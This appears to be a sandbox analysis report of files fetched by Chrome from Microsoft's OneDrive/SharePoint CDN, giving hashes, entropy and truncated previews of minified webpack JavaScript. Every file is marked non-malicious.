                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[48],{9145:function(e,t,n){n.d(t,{a:function(){return F},b:function(){return H}});var a=n("tslib_538"),i=n(3289),r=n(268),o=n(876),s=n(911),c=n(2943),d=n(4553),l=n(3381),u=n(3504),f=n(3382),p=n(3095),m=n(3380),_=n(3505),h=n(3806),b=n(3506),g=n(332),v=n(267),y=n(4147),S=n(2939),D=n(55),I=n(1835),x=n("odsp.util_517"),C=n(1841),O=n(3378),w=n(232),E=n(3379),A=!x.x9.isActivated("48d0bf6b-2e41-42a8-a3a3-e8d2ef405dbb","7/14/2022","better error handling"),L=x.x9.isActivated("3e85cd31-2807-44c1-96bf-35f08619ec11","1/31/2023","Fix for not appending navId to SPL link"),k=x.x9.isActivated("edb05947-5f5b-47a0-91ef-ddc0cef4e7a1","07/03/2024","sbarrameda: fix to use loginName if userId is undefined"),M=x.x9.isActivated("46a06a91-966f-47f1-af68-09d8b3864e12","07/03/2023","Override navId with navIdSendLinkOverride")||x.az.isFeatureEnabled({ECS:1107386}),P=x.x9.isActivated("62a4337e-d21e-407b-b2ef-2163777d20b8","12/19/2022","Li
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (24798)
                                                            Category:downloaded
                                                            Size (bytes):289832
                                                            Entropy (8bit):5.4560656064543585
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:01306BFF0E17635FE149AD997F762266
                                                            SHA1:1120C4794796C60D342403E88FE0D437998D064B
                                                            SHA-256:5468D1C8695EBAC1E3ECA042E474132CA7CFACE02899B9B46B5A1775684AD683
                                                            SHA-512:CF20918D16668A8F6C5DC407D890A1F0C8DEDCE745F416028440582FFC990C41267CF37A5B8637704E3C280DB7E51F0ED7DA2095BA54C00BBBC551B244A18EE4
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/81.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[81,260,2226,2229,1325,1324,101],{4126:function(e,t,n){n.d(t,{a:function(){return r}});var a=n(9069),i=n("odsp.util_517");function r(e,t,n){void 0===t&&(t="none"),void 0===n&&(n="normal");var r=a.ComponentName;switch(n){case"short":r=a.ComponentShortName;break;case"plural":r=a.ComponentPluralName}var o=r;switch(t){case"capitalize":o=r.charAt(0).toUpperCase()+r.slice(1);break;case"lowercase":o=r.toLowerCase()}return i.Z_(e,o)}}.,4512:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(9059),i={"-1":"",0:a.a,1:a.c,2:a.b}}.,4506:function(e,t,n){function a(e){return e&&e.webAbsoluteUrl===e.siteAbsoluteUrl}n.d(t,{a:function(){return a}})}.,6555:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(4506);function i(e){return!!e&&(0,a.a)(e)&&!!e.groupId&&!!e.isTeamsConnectedSite&&!e.isTeamsChannelSite}}.,6569:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("tslib_538"),i=n("react-lib"),r=n(1076),o=n(164
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5140)
                                                            Category:downloaded
                                                            Size (bytes):13533
                                                            Entropy (8bit):5.5072927520853385
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:282F05B7C9D7A3BDDF03475442C9013E
                                                            SHA1:947AD049F85D34886C46CC7DDC6875D8C46F65E3
                                                            SHA-256:3592EF7F600752E8942E44909F424720C6543214CD3DE94553E3AF35FB32FBB2
                                                            SHA-512:8D8D651DB0F8D53C52E653F128964E56F3B4DEF0F22C6112A66E02B7C4A2D110B83ED10014AB1B6DEC2F68AF37E6BBD5C562B0E9A8313EBEDB57CD3D882BE07F
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/59.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[59],{3630:function(e,t,n){n.d(t,{a:function(){return s},b:function(){return d}});var a=n(5298),i=n(1939),r=n(9247),o=n("odsp.util_517").x9.isActivated("686714b6-ee9c-44e7-9cc2-1fbe75a88eac"),s={ID:"",displayName:r.b,realFieldName:"File size",internalName:"FileSizeDisplay",type:i.a.FileSize,width:150,isCalculated:!0,isReadOnly:!0,isSortable:!0,isEditable:!1,rawFieldData:{FieldType:"FileSize",Name:"FileSizeDisplay",Groupable:"FALSE"}},c={ID:"",displayName:r.a,realFieldName:"Activity",internalName:"FileActivity",type:i.a.FileActivity,width:445,isCalculated:!0,isSortable:!1,isReadOnly:!0,isEditable:!1};function d(e,t){var n=[],i=null;if((0,a.a)(t)){for(var r=0,d=e;r<d.length;r++){var l=d[r];"SharedWith"===l.internalName?i=l:n.push(l)}return o&&n.push(s),i&&n.push(i),n.push(c),n}return e}}.,4574:function(e,t,n){n.d(t,{a:function(){return o}});var a=n("odsp.util_517"),i=a.x9.isActivated("43c21516-7a9e-4d81-ba4e-373
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7236)
                                                            Category:dropped
                                                            Size (bytes):7335
                                                            Entropy (8bit):5.137837224968061
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:19EA48B97943CA6EC9A809BF56C52A85
                                                            SHA1:FF8B027AD7BB2B0C1D79DE20FA83BF08851B66BE
                                                            SHA-256:A4570A3393508E86E924B76742746A681299E8F7A1FF618513C785A846AF8906
                                                            SHA-512:3D5C1BE0CBBBF167783EAE37FFAD192E0222C97BB7AF47EF25EA4047866531E43AF751425B35E4752167E8649E5CBD02D0CCC8F6848C149B566084E0ED48AE60
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:/*! For license information please see tslib-6a7224b3.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["tslib"],{tslib_538:function(e,t,n){n.d(t,{q5:function(){return r},DQ:function(){return S},$0:function(){return y},Gl:function(){return D},HE:function(){return v},yv:function(){return l},J4:function(){return w},_7:function(){return E},ic:function(){return f},j0:function(){return s},tI:function(){return p},e2:function(){return i},SO:function(){return u},Zu:function(){return O},VE:function(){return C},zH:function(){return I},Hu:function(){return d},Rd:function(){return c},pM:function(){return _},dc:function(){return o},lt:function(){return g},Ej:function(){return b},Hr:function(){return h},BW:function(){return m}});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("fu
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Java source, ASCII text
                                                            Category:downloaded
                                                            Size (bytes):699
                                                            Entropy (8bit):5.069580984057167
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:16B846C5552B971A5134E5305675F3B8
                                                            SHA1:9D5CC7891031BFBBFF9F412FD45357A73215B33B
                                                            SHA-256:2B916646076556EB231C606E748CDDCF0E3DAEA79A18F4D7FED1CDD04709A766
                                                            SHA-512:615337DEE2937BAD5902B3F2D554D550BC3CB90DB9D60EDE209EDC91752A2F1CDFC3731B96F6F3FC7D6662248FD795BF631CD30D0AFE9CA2BB8486A0E37A3DF0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://timecusa-my.sharepoint.com/_layouts/15/spwebworkerproxy.ashx
                                                            Preview:self._perfMarks = {};.self._markPerfStage=function(key) {if(self.performance && typeof self.performance.now === 'function'){self._perfMarks[key]=self.performance.now();} else{self._perfMarks[key]=Date.now();} if (self.performance && typeof self.performance.mark === 'function') {self.performance.mark(key);}};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsStart'));.self._cdnBaseUrl = 'https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/';.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/spwebworker.js');.self._wwKillSwitches = {};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsEnd'));.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5436)
                                                            Category:dropped
                                                            Size (bytes):7373
                                                            Entropy (8bit):5.33665361419742
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:660EF3F104C33839C6C7D1E5AB14640C
                                                            SHA1:4F7A3F23D3144A40BBF7F16BABB59DE8E3D32B8B
                                                            SHA-256:18B846BA05198FD2FD08E680E467C6A7D5B74F027F1349A2F045055C74241B93
                                                            SHA-512:707F3B0B215D49CF1F26396015FDB1BCEF1AFED3F8CDC109942CD280292A9D37AF5733525F157ED26A35D3C877EBF2F6168F1C1E1C1B620191645AE6C0FD3736
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[5,987],{4121:function(e,t,n){n.r(t),n.d(t,{getSessionToken:function(){return l}});var a=n("tslib_538"),i=n(1676),r=n(80),o=n(335),s=n(10),c=n("odsp.util_517"),d=n(1638);function l(e){var t=this;return function(n){return(0,a.yv)(t,void 0,void 0,function(){var t,l,f,p,m,_,h,b,g,v,y,S,D,I,x,C,O,w=this;return(0,a.SO)(this,function(E){switch(E.label){case 0:if(t=e.scopes,l=void 0===t?["Files.ReadWrite.All"]:t,f=e.endpoint,p=e.driveUrl,m=e.qosExtraData,_=n((0,r.a)({graphDataSourceConfiguration:i.a,graphTokenProviderConfiguration:d.a})),h=_.graphDataSourceConfiguration,b=_.graphTokenProviderConfiguration,g=h&&h.ensureAuthToken,v=p&&h&&h.ensureAuthTokenWithAction,y=b&&b.getSessionToken,D=y?function(){return(0,a.yv)(w,void 0,void 0,function(){return(0,a.SO)(this,function(e){switch(e.label){case 0:return[4,y({endpoint:f,driveUrl:p,path:p||f})];case 1:return[2,e.sent()]}})})}:v?function(){return(0,a.yv)(w,void 0,void 0,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (62787)
                                                            Category:downloaded
                                                            Size (bytes):68159
                                                            Entropy (8bit):4.833576201000286
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:362287259E9C37B47D3C823F1ED7DC93
                                                            SHA1:62838F9C6A99958BBCAE69FDA2504B60DBF1311C
                                                            SHA-256:85869654339DF7ADBB6D78F324F1E40BCD3CE632CDCA09975EBE07AA34E5D38D
                                                            SHA-512:D6D7DBB00F0404BCF52BAD168E8CB618483320C61F3CCEB7682CAA533CB99F29D2E5B16FDDD2CF9048C7E9C976F3DC04EAA6EA24E7FCBE58BC69BC72EA750889
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/stsserviceworkerprefetch/stsserviceworkerprefetch.js
                                                            Preview:.if (typeof self !== 'undefined') {. const versionedPaths = ["@ms/stream-bundle/chunks/11530.js","@ms/stream-bundle/chunks/11636.js","@ms/stream-bundle/chunks/1180.js","@ms/stream-bundle/chunks/23112.js","@ms/stream-bundle/chunks/23363.js","@ms/stream-bundle/chunks/24997.js","@ms/stream-bundle/chunks/25506.js","@ms/stream-bundle/chunks/30099.js","@ms/stream-bundle/chunks/31727.js","@ms/stream-bundle/chunks/32544.js","@ms/stream-bundle/chunks/358.js","@ms/stream-bundle/chunks/38564.js","@ms/stream-bundle/chunks/39410.js","@ms/stream-bundle/chunks/45766.js","@ms/stream-bundle/chunks/46571.js","@ms/stream-bundle/chunks/47269.js","@ms/stream-bundle/chunks/4747.js","@ms/stream-bundle/chunks/50717.js","@ms/stream-bundle/chunks/53319.js","@ms/stream-bundle/chunks/53379.js","@ms/stream-bundle/chunks/54394.js","@ms/stream-bundle/chunks/56643.js","@ms/stream-bundle/chunks/56770.js","@ms/stream-bundle/chunks/59721.js","@ms/stream-bundle/chunks/59926.js","@ms/stream-bundle/chunks/60792.js","@ms/s
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (2511)
                                                            Category:downloaded
                                                            Size (bytes):2516
                                                            Entropy (8bit):5.514631060156844
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:939409FFF68345636A63E7F5E3D80355
                                                            SHA1:0BE48A9A4D56053366BB2501A7BB94C1834A8579
                                                            SHA-256:A48DE43A5134B8964B39B5ACD078C6EF865D5D838B3F8A631329A7E8E3917D39
                                                            SHA-512:C826C55D6E8C66F6F656F74DBD9ABEA0803F19F15D7094599FB41CC9AA0C57E88E15084ADF955E323C0AA20A8390D178C3B2C3291D2064182F6D4B571E6C0921
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1043.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1043],{5589:function(e,t,n){n.r(t),n.d(t,{getShortcutUrlOperationHandler:function(){return v}});var a=n("tslib_538"),i=n(501),r=n(6),o=n(7),s=n(27),c=n(189),d=n(79),l=n(31),u=n(20),f=n(2522),p=n(25),m=n(217),_=n("odsp.util_517"),h=n(2119),b=n(90),g=n(5),v=(0,u.e)()(function(e){var t=this,n=e.itemKey;return function(e){return(0,a.yv)(t,void 0,void 0,function(){var t,u,v,y,S,D,I,x,C,O,w,E,A,L,k,M;return(0,a.SO)(this,function(P){switch(P.label){case 0:return(t=e((0,p.a)(function(e){return e.demandItemFacet(f.a,n)})))?(u=t.itemKey,v=e((0,i.a)({rowData:r.qc,spItem:o.a},u)),y=v.rowData,S=v.spItem,(D=S&&e((0,p.a)(function(e){return e.demandItemFacet(r.Ed,b.a.serialize({webAbsoluteUrl:S.webAbsoluteUrl,listFullUrl:S.listFullUrl}))})))&&S&&y&&"url"===y.File_x0020_Type?(I=y._ShortcutUrl)||_.x9.isActivated("29daf505-38af-4980-b966-f5a2e9eea564")?[3,3]:(x=S.webAbsoluteUrl,C=S.listFullUrl,O=new s.a(x).authority,[4,e((0,c.c
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4621)
                                                            Category:dropped
                                                            Size (bytes):9900
                                                            Entropy (8bit):5.194451063155924
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0C702EF7F588324D356437F9E95EF888
                                                            SHA1:15D194A1BBE43E4B7A9592A073FA46134EC56A6D
                                                            SHA-256:801238B10B3FE07B12A32C0A1485D6F1F415F74D05FEDF3747B50B9CDD77C2EC
                                                            SHA-512:EE1C8284013DA4168579E4C632448A47A0E7F2B346249ABCBF13E598C238BFE48EA8319431B9ED6FC45C642C145924951A8A09DFB8B35030DCB79BCFBC814D20
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[130],{5580:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_538"),i=n("react-lib"),r=n(49),o=n(136),s=n(2526),c=n(376),d=function(e){var t=e.gapSpace,n=void 0===t?0:t,d=e.directionalHint,l=void 0===d?o.a.bottomLeftEdge:d,u=e.directionalHintFixed,f=e.targetElement,p=e.firstFocus,m=e.trapFocus,_=e.onLeave,h=e.className,b=e.finalHeight,g=e.content,v=e.calloutProps,y=(0,a.q5)((0,a.q5)((0,a.q5)({},(0,r.h)(e,r.f)),{className:h,target:f,isBeakVisible:!1,directionalHint:l,directionalHintFixed:u,finalHeight:b,minPagePadding:24,onDismiss:_,gapSpace:n}),v);return i.createElement(i.Fragment,null,m?i.createElement(s.a,(0,a.q5)({},y,{focusTrapProps:{forceFocusInsideTrap:!1,isClickableOutsideFocusTrap:!0,disableFirstFocus:!p}}),g):i.createElement(c.a,(0,a.q5)({},y),g))}}.,4732:function(e,t,n){n.d(t,{a:function(){return h}});var a=n(40),i=n(48),r=n("fui.core_220"),o={root:"ms-ExpandingCard-root",compactCard:"ms
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (14735)
                                                            Category:dropped
                                                            Size (bytes):38361
                                                            Entropy (8bit):5.27883058752641
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1A41EC2F1D1F8E9E5E90341095A47E9F
                                                            SHA1:383346B550294BEFC326446758A92094C3F3B727
                                                            SHA-256:0512CAE7917BA892D381747667617E5EB246F9093C3D829694D0C2042EC4C786
                                                            SHA-512:EF7B6D2AD32358D2DD148912AD466F2C01D4DD67904705805A7CA859F1E7609EF60CDDEF74CF23CC04FE4BD2630A38314F772FAC909022CDD5FC8089E86B9AE0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[282],{2667:function(e,t,n){var a,i,r;n.d(t,{a:function(){return r},b:function(){return i},c:function(){return a}}),function(e){e[e.tiny=0]="tiny",e[e.extraExtraSmall=1]="extraExtraSmall",e[e.extraSmall=2]="extraSmall",e[e.small=3]="small",e[e.regular=4]="regular",e[e.large=5]="large",e[e.extraLarge=6]="extraLarge",e[e.size8=17]="size8",e[e.size10=9]="size10",e[e.size16=8]="size16",e[e.size24=10]="size24",e[e.size28=7]="size28",e[e.size32=11]="size32",e[e.size40=12]="size40",e[e.size48=13]="size48",e[e.size56=16]="size56",e[e.size72=14]="size72",e[e.size100=15]="size100",e[e.size120=18]="size120"}(a||(a={})),function(e){e[e.none=0]="none",e[e.offline=1]="offline",e[e.online=2]="online",e[e.away=3]="away",e[e.dnd=4]="dnd",e[e.blocked=5]="blocked",e[e.busy=6]="busy"}(i||(i={})),function(e){e[e.lightBlue=0]="lightBlue",e[e.blue=1]="blue",e[e.darkBlue=2]="darkBlue",e[e.teal=3]="teal",e[e.lightGreen=4]="lightGreen"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4154)
                                                            Category:dropped
                                                            Size (bytes):28390
                                                            Entropy (8bit):5.508707019788577
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7F5A26B4C10779C68AC1E8B1F73248CB
                                                            SHA1:DFA2B28D832BA8981DE8B72E7CB27098A669F197
                                                            SHA-256:DCE14087DF8B9CAB9CEBFB171332A7209EBD209CBE529F6E32801EF93E5DF936
                                                            SHA-512:82DF1BFF11CDD607CBC6A9136EB267F13D2C822EEDA11BF1863EAF41D88BFBC861D2B1EE622F4E433928AF312914832EA53897B2093359E6F680A8B12E4B8B14
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[54,260,275,292,1452],{2571:function(e,t,n){n.d(t,{a:function(){return c}});var a=n("react-lib"),i=n(2188),r=n("fui.core_220");const o=(0,r.Oz8)({root:{mc9l5x:"f1w7gpdv",Bg96gwp:"fez10in",ycbfsm:"fg4l7m0"},rtl:{Bz10aip:"f13rod7r"}},{d:[".f1w7gpdv{display:inline;}",".fez10in{line-height:0;}",".f13rod7r{-webkit-transform:scaleX(-1);-moz-transform:scaleX(-1);-ms-transform:scaleX(-1);transform:scaleX(-1);}"],t:["@media (forced-colors: active){.fg4l7m0{forced-color-adjust:auto;}}"]}),s=(e,t)=>{const{title:n,primaryFill:a="currentColor",...s}=e,c={...s,title:void 0,fill:a},d=o(),l=(0,i.b)();return c.className=(0,r.daq)(d.root,(null==t?void 0:t.flipInRtl)&&"rtl"===(null==l?void 0:l.textDirection)&&d.rtl,c.className),n&&(c["aria-label"]=n),c["aria-label"]||c["aria-labelledby"]?c.role="img":c["aria-hidden"]=!0,c},c=(e,t,n,i)=>{const r="1em"===t?"20":t,o=a.forwardRef((e,o)=>{const c={...s(e,{flipInRtl:null==i?void 0:i.f
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4954)
                                                            Category:dropped
                                                            Size (bytes):995192
                                                            Entropy (8bit):5.442978222309426
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F44D7BA8A82B0883970FC7816AC71148
                                                            SHA1:9F4D3C8C75861CD751144461858FE8F1CD806F45
                                                            SHA-256:A8BDE94B72C62808D8B3F74AD21304294B2E337852A23B885C7C8F1D62826D00
                                                            SHA-512:27EA968234395F9566501232DBC540178F7BC1EE3FE006631806AB2BC1D4053D1B8628CD103F811E5A5F80CBF229730C346FD6167A4C4BD36551FDA2ACB1FFDE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[410,1385,2310,1156],{2751:function(e,t,n){n.r(t),n.d(t,{abbreviateNumberToShortString:function(){return a.n},capitalize:function(){return a.kk},countFormatArguments:function(){return a.RA},decapitalize:function(){return a.NE},doesStringEndWith:function(){return a.Sz},doesStringStartWith:function(){return a.HO},equalsCaseInsensitive:function(){return a.VZ},findOneOf:function(){return a.Yu},format:function(){return a.Z_},formatToArray:function(){return a.BC},formatWithLouserzedCountValue:function(){return a.se},getLouserzedCountValue:function(){return a.at},leftPad:function(){return a.Li},localeStringMatch:function(){return a.dd},padData:function(){return a.Zw},pluralSelect:function(){return a.UD},repeat:function(){return a.j8},replaceAll:function(){return a.Yt},rightPad:function(){return a.TO}});var a=n("odsp.util_517")}.,2667:function(e,t,n){var a,i,r;n.d(t,{a:function(){return r},b:function(){return i},c:fun
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7269)
                                                            Category:downloaded
                                                            Size (bytes):29998
                                                            Entropy (8bit):5.446898859226419
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:96AA0597519D28CC4182EF47FD8B6112
                                                            SHA1:E1D4E25135306B77EDABFE0C84D51A30CB166F97
                                                            SHA-256:1A8CFA441253B102F215B3AB4D6BB808D0DE8E9ACFBD13EC95B9773F2EB0E6AC
                                                            SHA-512:7FB9B7D88030167CA0E01D907F4A5CFD071F7257F79B0E09EEB63111C555A5486A3883ED3ECB678A32C868B483B0DB63AD1AC044C70BD738B75D8A32421D2C84
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/22.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[22],{9424:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("react-lib"),i=n(143),r=n(142),o=n(9425),s=n("fui.core_220"),c=n(162),d=n(9426);const l={"extra-small":"tiny",small:"extra-small",medium:"small",large:"medium","extra-large":"large",huge:"large"},u={"extra-small":20,small:28,medium:32,large:36,"extra-large":40,huge:56},f=(0,s.ir4)("rlroi9i",null,[".rlroi9i{display:inline-grid;grid-auto-rows:max-content;grid-auto-flow:column;justify-items:start;grid-template-columns:max-content [middle] auto;}"]),p=(0,s.Oz8)({beforeAfterCenter:{wkccdc:"f1iantul"},after:{},before:{B7hvi0a:"f1tll2w5",Budl1dq:"ffvkwdr"},below:{Bxotwcr:"f1nkeedh",B7hvi0a:"f1oiokrs",Budl1dq:"f1emgwh2"},media:{Ijaq50:"f1hek2iy"},mediaBeforeAfterCenter:{Ijaq50:"fa4dipu"},start:{qb2dma:"f9h729m"},center:{qb2dma:"f7nlbp4"},afterAlignToPrimary:{qb2dma:"f7nlbp4",Ijaq50:"f1rnkkuc",Bw0ie65:"f1warjpf"},beforeAlignToPrimary:{qb2dma:"f7nlbp4",I
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (10664)
                                                            Category:downloaded
                                                            Size (bytes):11897
                                                            Entropy (8bit):5.682856752989261
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4E9626ADD2BFA447C44BE80D49963918
                                                            SHA1:3C30C2A78937C9034BDC9DDD99BCEB71206528B2
                                                            SHA-256:4AE62F9AB850554BAB26D5F59657AE5FFBFF01BF6DB448B3E9C1EF3389F62B9D
                                                            SHA-512:9F1A91B226A9D2C35C1FF46F33F574A7FDA93D88042772B78467BF8C09CE66559487B3A3EDB7471F2B874D538C30C9ECB5EF53FFA611F1DDBA77C082CA6FB4BE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/155.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[155],{9712:function(e,t,n){n.d(t,{a:function(){return f},b:function(){return p}});var a=n("odsp.util_517"),i=n(86),r="Stream",o=1855,s={FluentUIV9ShimOverallControl:60077,FluentUIV9ShimDefaultButton:60337,FluentUIV9ShimPrimaryButton:60344,FluentUIV9ShimIconButton:60355,FluentUIV9ShimActionButton:60356,FluentUIV9ShimImage:60357,FluentUIV9ShimToggle:60461,FluentUIV9ShimCommandBarButton:60466,FluentUIV9ShimCommandBar:60480,FluentUIV9ShimCommandButton:60501,FluentUIV9ShimTooltipHost:60634,FluentUIV9ShimTooltip:60633,FluentUIV9ShimLink:60405,FluentUIV9ShimStack:60413,FluentUIV9ShimCheckbox:60414,FluentUIV9ShimDialog:60426,FluentUIV9ShimChoiceGroup:60415,FluentUIV9ShimPersona:60419,FluentUIV9ShimFacepile:60569,FluentUIV9ShimPivot:60105,FluentUIV9ShimContextualMenu:60556,FluentUIV9ShimOverlay:60547,FluentUIV9ShimOverflowSet:60555,FluentUIV9ShimIcon:60446,FluentUIV9ShimSpinner:60450,FluentUIV9ShimSlider:60454,FluentU
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (17026)
                                                            Category:downloaded
                                                            Size (bytes):80512
                                                            Entropy (8bit):5.402479186529808
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D12C95830E566C934ED75A847814E3C3
                                                            SHA1:E80D38B79CC0331E3538578F959DC9C3AB3A99B1
                                                            SHA-256:88177A9387E2071F6D6CAB04E2717E52317F414B33F24A4B93EE2E81A6C4BC08
                                                            SHA-512:A288BACFF06EC08538B2713AE217E7FFCE6050CFD9A4EBF6AF2F00395DB8920293417FF48B2E2431ED3D6A434EFE53791FB6D6B4B35EE7ABECBA5D56244CEB8E
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/37.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[37,1171],{3487:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.publish=0]="publish",e[e.schedule=1]="schedule",e[e.unpublish=2]="unpublish"}(a||(a={}))}.,6531:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_538"),i=n(20),r=n(67),o=n(74),s=n(279),c=n(5202),d=(0,i.b)(function(){return function(e){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(t){return e((0,r.b)(s.b,o.a)(c.b)),e((0,r.b)(s.a,o.a)(c.b)),[2]})})}})}.,6535:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_538"),i=n(46),r=n(20),o=n(338),s=n(224);function c(e,t){var n=t.currentItemKey,a=e.demandItemFacet(s.a,n);return a?{currentItemKey:a.remoteItemKey}:{}}var d=(0,r.b)(function(){return function(e){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(t){return e((0,i.b)(s.a,o.a)(c)),[2]})})}})}.,5202:function(e,t,n){n.d(t,{a:function(){return D},b:fu
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):222
                                                            Entropy (8bit):5.36895149365448
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6974F2EC1CE3102A4D0A268A9A4828DD
                                                            SHA1:2FF25D23ED3AC9B0D64275506AC9C7F94EB4FECB
                                                            SHA-256:40E1A274BA9A0D4FE313B25FE7149DE20463D08D84C8D081BE032E3A16E9A50A
                                                            SHA-512:F18165B76E2FE91E45152793F87582D4E8223E022A1E551DEEF1CF16AACB714D6B8FE89389CD19BA3C36FD29A9D5E3086627293A208AB4BD0F8393D5FEDCB713
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:{"OneShell":{"default":true},"Headers":{"ETag":"\"JHY6QFQ1fzyoMdE9X52gRZr8ZvunziTT24ISliYPVXc=\"","Expires":"Mon, 13 Jan 2025 20:48:41 GMT","CountryCode":"US","StatusCode":"200"},"ConfigIDs":{"OneShell":"P-D-1117449-1-4"}}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (16804)
                                                            Category:dropped
                                                            Size (bytes):32035
                                                            Entropy (8bit):5.392442881573731
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:345B1D1159F7841C27C561301ABEB0AD
                                                            SHA1:5032C4FEF5BC3D8414D62A9EAD183649ACAC7382
                                                            SHA-256:F3F996A7357CC3FB49015A9BBC23CE3A6CC5D2CE7D31B71C4EFC59248677D270
                                                            SHA-512:B2BC0A814C26995E1E85DF4561B4D9797BAE5947BD43771187C32B47C276805A743AD04DEA846340F685073B39E2A9D9D647F8B1D077294B20494D8F7C92C5C6
                                                            Malicious:false
                                                            Reputation:unknown
